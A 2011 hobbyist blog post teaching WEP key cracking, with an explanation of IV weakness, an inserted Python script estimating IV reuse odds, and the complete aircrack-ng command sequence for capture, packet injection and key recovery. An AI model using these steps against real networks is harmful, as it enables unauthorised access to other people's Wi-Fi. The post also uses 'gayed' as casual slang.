Thursday 24 February 2011

WEP Cracking

So for the next vid, I decided to show how to crack a WEP key. WEP is very insecure and not too difficult to break.

So before everyone thinks "yay free wifi", don't start breaking into your next door neighbour's wifi. Instead, try advising them that maybe they should think about changing their security.

A few prerequisites:
You will struggle to do this in a virtual box.
A lot of laptop network cards will not work as there are driver issues.
The network card must be able to switch to monitor mode, and if it can also packet inject, it makes life easier.

Theory:
So why is WEP so insecure? WEP uses the RC4 stream cipher, an initialisation vector and the WEP key.
The initialisation vector (IV) is only 24 bits long, which is far too short. When packets are sent through the access point, the WEP key plus the IV form the RC4 key, and the IV part is sent in the clear, meaning it is visible for all to see. Once the attacker has seen or collected enough of these IVs, it is possible to work out the WEP key. By re-injecting packets we are able to speed this process up.
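To put a number on "far too short", here is a small added example (my own illustration, not part of the original post or the aircrack-ng project) that works the birthday problem for a 24-bit IV space: how likely it is that at least one IV value has already been reused after a given number of packets. The function names and the packet counts fed in are my own choices; the only input from the post is the 24-bit IV length.

```python
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS  # 16,777,216 possible IV values


def iv_collision_probability(packets: int, iv_space: int = IV_SPACE) -> float:
    """Probability that at least one IV has been reused after `packets` frames.

    Classic birthday bound, assuming each IV is drawn uniformly at random.
    (Many real WEP implementations used a simple counter that restarted at
    zero after a reset, which makes reuse happen even sooner, not later.)
    Computed exactly in log space: P(no repeat) = prod_{i<n} (1 - i/N).
    """
    if packets <= 1:
        return 0.0
    if packets > iv_space:
        return 1.0  # pigeonhole: more frames than IV values
    log_no_repeat = sum(math.log1p(-i / iv_space) for i in range(packets))
    return 1.0 - math.exp(log_no_repeat)


def packets_for_collision_probability(target: float, iv_space: int = IV_SPACE) -> int:
    """Smallest packet count at which the reuse probability reaches `target`.

    Binary search over the (monotonic) probability function.
    """
    if not 0.0 < target < 1.0:
        raise ValueError("target must be strictly between 0 and 1")
    lo, hi = 1, iv_space + 1
    while lo < hi:
        mid = (lo + hi) // 2
        if iv_collision_probability(mid, iv_space) >= target:
            hi = mid
        else:
            lo = mid + 1
    return lo


def reuse_table(counts=(1000, 2500, 5000, 10000, 20000)) -> dict:
    """Reuse probability for a handful of constructed packet counts."""
    return {n: iv_collision_probability(n) for n in counts}


if __name__ == "__main__":
    print(f"IV space: {IV_SPACE:,} values ({IV_BITS} bits)")
    for n, p in reuse_table().items():
        print(f"after {n:>6,} packets: P(IV already reused) = {p:.4%}")
    half = packets_for_collision_probability(0.5)
    print(f"50% chance of a repeated IV after only {half:,} packets")
```

The point of the table is that a busy access point pushes out thousands of frames a minute, so an IV repeat is not a rare event but an expected one within minutes of normal use, before any injection is involved. That is the structural reason a WEP network cannot be made safe by picking a "strong" key; only moving off WEP removes the problem.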


The steps:

airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c (channel) -w 2neon --bssid (bssid) mon0
aireplay-ng -1 0 -a (bssid) mon0
aireplay-ng -3 -b (bssid) mon0
aircrack-ng -b (bssid) 2neon-01.cap

-c is the channel of the access point
-w is the capture file prefix; name it anything, as long as at the end you point aircrack-ng at the matching (prefix)-01.cap file (here 2neon-01.cap)

The video:
WEP cracking in BT

Again the mouse was gayed when recording this, will make sure that in the next vids that is sorted.

In the words of swaZ "we're cooking now".

Cheers
2neon
